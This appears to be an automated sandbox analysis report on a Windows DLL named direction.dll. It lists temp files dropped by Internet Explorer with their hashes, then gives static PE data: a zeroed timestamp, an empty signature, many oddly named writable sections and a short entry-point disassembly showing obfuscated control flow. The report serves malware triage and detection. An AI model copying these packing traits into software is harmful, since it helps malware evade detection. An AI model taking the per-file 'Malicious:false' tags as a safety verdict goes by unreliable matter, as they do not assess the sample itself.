                                                    SHA-512:A2CAB95FCB4250FA60D2D3657853B247DAFA40704C19C6425A23F55DC8897DDC4E0A1E924CD4C344F7FDED8DE3BA0D7E5765FCDD5D88A1C285B5A853F3A30F25
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF43155A3143EFA574.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39753
                                                    Entropy (8bit):0.5958611672578876
                                                    Encrypted:false
                                                    SSDEEP:192:kBqoxKAuqR+1Wuk1e8Ubc+IG/GUbc+IG/aUbc+IG/L:kBqoxKAuqR+1Wuk1e8q+Nq+tq+y
                                                    MD5:FAFAA936A992D3E18BE42F89228EA962
                                                    SHA1:38D617C943FAE2703FED285BA67B8E4CE51F4BCC
                                                    SHA-256:4347478B7D9CD812C460DDFB5EE5563057AE186F52FF4235ABF15BEB5351BD23
                                                    SHA-512:C6C84A32E40BCA05521A7D3B8A6D464D6C4CE79810F6CCAF6F3542737DD2AF201269E8BA1336D9A4F75B3FEC53F1E230BB426699466A7CC3CBAF7EF997B9781C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF5B43CBF5195BF9EE.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39649
                                                    Entropy (8bit):0.5753459890415039
                                                    Encrypted:false
                                                    SSDEEP:48:kBqoxKAuvScS+brqWbn7b5bobEIbEW5EtK0r6Xiy5EtK0r6XiK5EtK0r6XiD:kBqoxKAuvScS+qWXF03lbjbvbU
                                                    MD5:3D6C87EF879027C361413994D587108B
                                                    SHA1:CA3ED4BAF2EE027304735C2BA1D57AE6C1C366DD
                                                    SHA-256:78F7FB9FEB6EA56A7301E12DF768B1AB0DBFFBBD68DB7C54DD486DCE3ED70FD2
                                                    SHA-512:EA17172FDCB5177D6C56F0F0254066B6D2657146420710AF7CCF74DF5C8A636AA26A930D07B18A4A313FE2D35D26119A3D3F96A33D40EAAAD1FBB40BEF6D0DE3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF6F8684DB9D016133.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):25441
                                                    Entropy (8bit):0.27918767598683664
                                                    Encrypted:false
                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
                                                    MD5:AB889A32AB9ACD33E816C2422337C69A
                                                    SHA1:1190C6B34DED2D295827C2A88310D10A8B90B59B
                                                    SHA-256:4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
                                                    SHA-512:BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF7E831F15B8DCF16F.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39673
                                                    Entropy (8bit):0.5779156265542564
                                                    Encrypted:false
                                                    SSDEEP:192:kBqoxKAuqR+4WtfW9jP8g0YWP8g0YSP8g0YD:kBqoxKAuqR+4WtfW9j7K7u7/
                                                    MD5:981DC7D32A3D4AC52ECCD75BCEF71DB2
                                                    SHA1:4B30780E8204A9F6943499604B1D28787DA1085A
                                                    SHA-256:5B502E58A51D294B49496190E4C7F9DE980A136CC5BB77C2D66F9ED643E53B4A
                                                    SHA-512:4216422EDC084CBB1D00F4D804612BBD4DEF4E33486F360CF9311CCA4E5EA4B2EAA9AB9A624E9177E1074C4C00E7AC870B92E32EDBD82DF37A589F2FCE35E0D5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF9102EC45A64E1E43.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39601
                                                    Entropy (8bit):0.5639045151385745
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+pWSYpycLq0UcLq0UMLq0Ut:kBqoxKAuqR+pWSYpyc2c2M2t
                                                    MD5:0E9369C76BD9BFFF488F3992D0FE9BDA
                                                    SHA1:A3001B3353695EF2F9770DA7BC18E560AC9DDB92
                                                    SHA-256:1B3E5473B76C3B82E6E3CE57A80211F137479BB99BB6B7A7FD24961BBF0804B6
                                                    SHA-512:B7AF2676CB8C823CA8160459B8D35F0DAEA2331F615AB74E5B013A7163E2A6434A6FB8358D8655C31F4EAA59BCAACC875B37E549E19124178D3854FA60FF8882
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DFD13F26D934E0A1F7.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39601
                                                    Entropy (8bit):0.5638931680694919
                                                    Encrypted:false
                                                    SSDEEP:192:kBqoxKAuqR+gWl3elP1VS1tk1VS1tE1VS1tF:kBqoxKAuqR+gWl3elP1gM1g81gd
                                                    MD5:8ACE6A3C030B1B2E635AD9BC07E7F9F7
                                                    SHA1:244E818098A194FFC3652957FFBA8E7E600BD496
                                                    SHA-256:98D0955F5599635A4D57B7ADA7C1DC105BA6023860D25245B40F71D849F00F97
                                                    SHA-512:6423A2D98559F84D894E138FCACE311CDCE18536785AE5FE04004341841FD113B3709CCF2C5BCC1A5EED7FC5CE1A2ADAC1D525AF3DE62B04DC8B2EEBA605D90A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DFD220BA7F3D9FB6B4.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):34809
                                                    Entropy (8bit):0.43261492810716984
                                                    Encrypted:false
                                                    SSDEEP:48:kBqoxKAuvScS+8Wl7T6+I++YSh+7XOxIlrZzs:kBqoxKAuvScS+8WRT6hr87XOxIxds
                                                    MD5:3360A35A3957F87427995602AB920B6F
                                                    SHA1:F171F0EFA0B5E3BC8AEA91ACA46B59B00F6A1184
                                                    SHA-256:A7F6EE8DCDA2468056FD1ED600CAD1B8272A8A0F86E4841D244FFA7F9EFC8444
                                                    SHA-512:B02698174FAF10AC06C4927A7004A9DA3BB49EDA5F995BA98DB6E9ADEA98856E5B8EF7DEE28073097C1FB196C09F4D6FEB2770272A3C8E41BF8812D4B73B5031
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DFF4812447DAB93837.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):22053
                                                    Entropy (8bit):3.070985808134526
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoIoWSwfSvvWdKInOejHtcSL1ShSESqSi:kBqoIoWSweYzli
                                                    MD5:B193702FD9A1BD6CB176758CCCE32640
                                                    SHA1:5848C137268A6F58AEB4078BE624F5200186BFB2
                                                    SHA-256:40467E8C233DF7D43FA8F878ECE37FEAAF64089679A87AACD1DCBF4A2CF9AE78
                                                    SHA-512:B78E4B2532D0E458925FDE8F6A4D5CC3C36D1BF365F0B2DC3396E72922877AFDFB342AE5B1ECD1836B10A63E988570A793701A605F94A11380EE95474B601FCD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DFF6E4AABF0B887D06.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):368814
                                                    Entropy (8bit):3.2556853601384774
                                                    Encrypted:false
                                                    SSDEEP:3072:sZ/2Bfcdmu5kgTzGtXZ/2Bfc+mu5kgTzGt5Z/2Bfcdmu5kgTzGtMZ/2Bfc+mu5kn:F03P
                                                    MD5:D638C56272469617AC69CDB48B526ADC
                                                    SHA1:5F1083EAFE5DAB08CC894A8943FD5E10C6EFA00A
                                                    SHA-256:DCD998A9860CFB0334766EC51CEBBEC980D0CB762B2C3635E01D773138A151B9
                                                    SHA-512:F8AE57D32A728AEFD418A58DC11B7C07341889CA194EB5B228E993B9D49F3ADE652E2AD0368B7EEC3793F177F4A09511D49BC4E74A4437D4981F865E2366E872
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DFFCBD3BE53D547AFD.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39625
                                                    Entropy (8bit):0.5698558980029956
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+WWnDhAj1Hv2lJ5Hv2lJxHv2lJW:kBqoxKAuqR+WWDhAj1P2lHP2lvP2l0
                                                    MD5:0D9B0F76BBD9770B7F0F84D57CAD1FC6
                                                    SHA1:612F5BC7A64397AE25327AC6CF0E5473B89CD5D6
                                                    SHA-256:3B254F87C565755BDBF4310DD2B76BD9BEAC81BB586BE8B65D9937C5DADA628E
                                                    SHA-512:686632E90EF009AD58E8D1942A5036C21776D903C4C83493C7B87C69A5B7FF68FE7E6EBD43AF5AF0F8CE287C29AD7D752FD976B88D159B7EA0FBD097FD484A25
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FCLX7G9B8I9GZL4REK7F.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.191863225405466
                                                    Encrypted:false
                                                    SSDEEP:48:adiDoP4IHC9GrIoPAsASF2diDoP4IHh683GrIoPAczH:FoP4l9SvAJUoP4m3SvAG
                                                    MD5:A4D6CB78A92EE8DDEF2435BCB47C6B84
                                                    SHA1:B9118B09F3143440BABEF7BC5DDBC4E091177581
                                                    SHA-256:FC24D5DD426D5A106F7D43881A4BB6F932AB9BCB8812359A5B1DAA34482351A2
                                                    SHA-512:834C10460A3A66BBC0C0275A39BC4B8A72BEFA5CD8915FB0FB4115435B4558900DA54BFF9CB8311B757909AACDF04BCB09B8502683554FBB533EBC0A3CE553F2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>...v3........?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N2LHZI30ZDHRXE2DHFW6.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.193406842865962
                                                    Encrypted:false
                                                    SSDEEP:48:6diDoP4IHC9GrIoPAsASFWdiDoP4IHh683GrIoPAczH:loP4l9SvAJEoP4m3SvAG
                                                    MD5:D38E5F062785E537BCE73ADD7A9FEE11
                                                    SHA1:295574E7DEF964C85D05921FA1E13D22EBA9F9E3
                                                    SHA-256:21C3C1C52218C0B0464D977D6FC4E0D193DB46E813AC0FEB9B3F685C4E7DFD8D
                                                    SHA-512:434B6FE11919A0DC0767AB18FFA0D7EF16B96EFCD4F13203BEF7B002BDB8F41FC06CBC84480477AC16F37C00BD8CB29AF1FA50EC11EB43B5F810C7723BDBC6A2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>.....u.......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZOSUZN4465XZ22XOQ3E.temp
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3440
                                                    Entropy (8bit):3.191863225405466
                                                    Encrypted:false
                                                    SSDEEP:48:adiDoP4IHC9GrIoPAsASF2diDoP4IHh683GrIoPAczH:FoP4l9SvAJUoP4m3SvAG
                                                    MD5:A4D6CB78A92EE8DDEF2435BCB47C6B84
                                                    SHA1:B9118B09F3143440BABEF7BC5DDBC4E091177581
                                                    SHA-256:FC24D5DD426D5A106F7D43881A4BB6F932AB9BCB8812359A5B1DAA34482351A2
                                                    SHA-512:834C10460A3A66BBC0C0275A39BC4B8A72BEFA5CD8915FB0FB4115435B4558900DA54BFF9CB8311B757909AACDF04BCB09B8502683554FBB533EBC0A3CE553F2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...................................FL..................F.@.. .....@.>...v3........?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q=w..PROGRA~1..t......L..R.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..R...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.R......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

                                                    Static File Info

                                                    General

                                                    File type:MS-DOS executable, MZ for MS-DOS
                                                    Entropy (8bit):6.4061376769323415
                                                    TrID:
                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                    • DOS Executable Generic (2002/1) 0.20%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:direction.dll
                                                    File size:258504
                                                    MD5:499200f6a8e223c057c6e16701740721
                                                    SHA1:ef46f9c62b94715b750173074c51100285ff6fe9
                                                    SHA256:d7e64f8e65ce586ce2f0a857810b2a23f85140bf5e52e5a824f09787fb2bf45e
                                                    SHA512:b32e3c480c7533d6fa745b3d22bf7d7bed1d0f52452b77c8232560e3d3e8979db53e0e45eb47e81757b6f20cfa01b20c55d5e63f423d89666ee74e6c9988a511
                                                    SSDEEP:3072:SEF7LCAtgVteclWZuw72sQI6ja4IyXBiGqfWOSi7NTk+0UylJm2os4nd41RgVTo6:SEFXKVteapw7SIJ4G9dpNyjmJLsRGPhz
                                                    File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!................d........ .......................................N..............................R......

                                                    File Icon

                                                    Icon Hash:9cdadaa6a6a6e400

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x10059964
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x10000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                    DLL Characteristics:
                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:d34313ce3555dec95480bcae2d5dea6b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        inc eax
                                                        jmp 00007FB0F8AFEEF0h
                                                        int3
                                                        call 00007FB0F8AFD19Ah
                                                        push 1007E6EDh
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000001h
                                                        call dword ptr [10062076h]
                                                        cmp eax, 00000000h
                                                        jne 00007FB0F8AF2CA7h
                                                        push 00000000h
                                                        call dword ptr [10062072h]
                                                        push dword ptr [1007F3F1h]
                                                        push 00000005h
                                                        push dword ptr [1007F45Bh]
                                                        push 0000001Ch
                                                        push dword ptr [ebp+0Ch]
                                                        push 10058F5Bh
                                                        ret
                                                        int3
                                                        int3
                                                        mov edi, dword ptr [esi]
                                                        sub esi, DA0AF43Ah
                                                        xor esi, dword ptr [1007EEC5h]
                                                        sub esi, 49h
                                                        mov dword ptr [1007F4D1h], esi
                                                        push 00000000h
                                                        push 1005E69Fh
                                                        ret
                                                        jmp 00007FB0F8AF81CBh
                                                        xor eax, ebp
                                                        lea ecx, dword ptr [ebp-24h]
                                                        add eax, 28h
                                                        mov dword ptr [1000D104h], 00000001h
                                                        int3
                                                        int3
                                                        add ecx, eax
                                                        int3
                                                        call 00007FB0F8AFC67Ch
                                                        pop ebx
                                                        int3
                                                        pop dword ptr [1000D210h]
                                                        xor ecx, eax
                                                        push 00000000h
                                                        push 00000000h
                                                        push 00000001h
                                                        call dword ptr [10062076h]
                                                        push 1005566Fh
                                                        ret
                                                        mov dword ptr [ebp-34h], eax
                                                        pop ecx
                                                        cmp dword ptr [ebp+08h], eax
                                                        je 00007FB0F8AFD459h
                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                        int3
                                                        and dword ptr [ebp-04h], 00000000h
                                                        int3
                                                        jmp 00007FB0F8AFD2D5h

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x60f520x3f1.text
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x620820x28.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x850000x8ca5.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x3ea000xffffffff
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000x1e10.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x6206e0x14.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .unsooth0x10000x1be0x200False0.74609375data5.05965650539IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .prekind0x20000x57550x200False0.8359375data5.55991795387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .aqueoig0x80000x56bb0x200False0.607421875data4.089974355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .spiritr0xe0000x56b60x200False0.6171875data4.32537549194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .nectaro0x140000x57470x200False0.779296875data5.28600359483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .philolo0x1a0000x1910x200False0.6875data4.6969561979IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .pres0x1b0000x19f0x200False0.703125data4.84520818639IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .outglad0x1c0000x56f50x200False0.6796875data4.69557672384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .pogonir0x220000xfc0x200False0.484375data3.3261397334IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .taurico0x230000x56cb0x200False0.650390625data4.40534616445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .untar0x290000xec0x200False0.435546875data2.96362208909IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .muskroo0x2a0000x57520x200False0.80859375data5.31594136919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .cricoto0x300000x56f10x200False0.67578125data4.63187162043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .breaghe0x360000x569b0x200False0.576171875data3.95722657349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .shunnab0x3c0000x1f80x200False0.83203125data5.3891798566IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .hemaut0x3d0000x1900x200False0.677734375data4.65755245189IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .uncongr0x3e0000x1b30x200False0.75data5.10140119986IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .tonner0x3f0000x57230x200False0.75data5.11518896506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .jink0x450000x2200x400False0.4326171875data3.53364999014IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .stirles0x460000x15f0x200False0.60546875DOS executable (COM)4.18109406994IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .imper0x470000x1700x200False0.634765625data4.46625189416IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .unsubve0x480000x576f0x400False0.4345703125data3.47992565687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .text0x4e0000x1336b0x13400False0.55760450487data6.30608125945IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x620000xaa0x200False0.236328125data1.73649757383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x630000x21a9b0x1c600False0.605004129956data6.00866637611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x850000x8ca50x8e00False0.217814700704data4.84189780533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x8e0000x1e100x2000False0.770629882812data6.65709646572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x852b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                        RT_ICON0x857180x988dataEnglishUnited States
                                                        RT_ICON0x860a00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x871480x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_ICON0x896f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                        RT_GROUP_ICON0x8d9180x14dataEnglishUnited States
                                                        RT_GROUP_ICON0x8d92c0x14dataEnglishUnited States
                                                        RT_GROUP_ICON0x8d9400x14dataEnglishUnited States
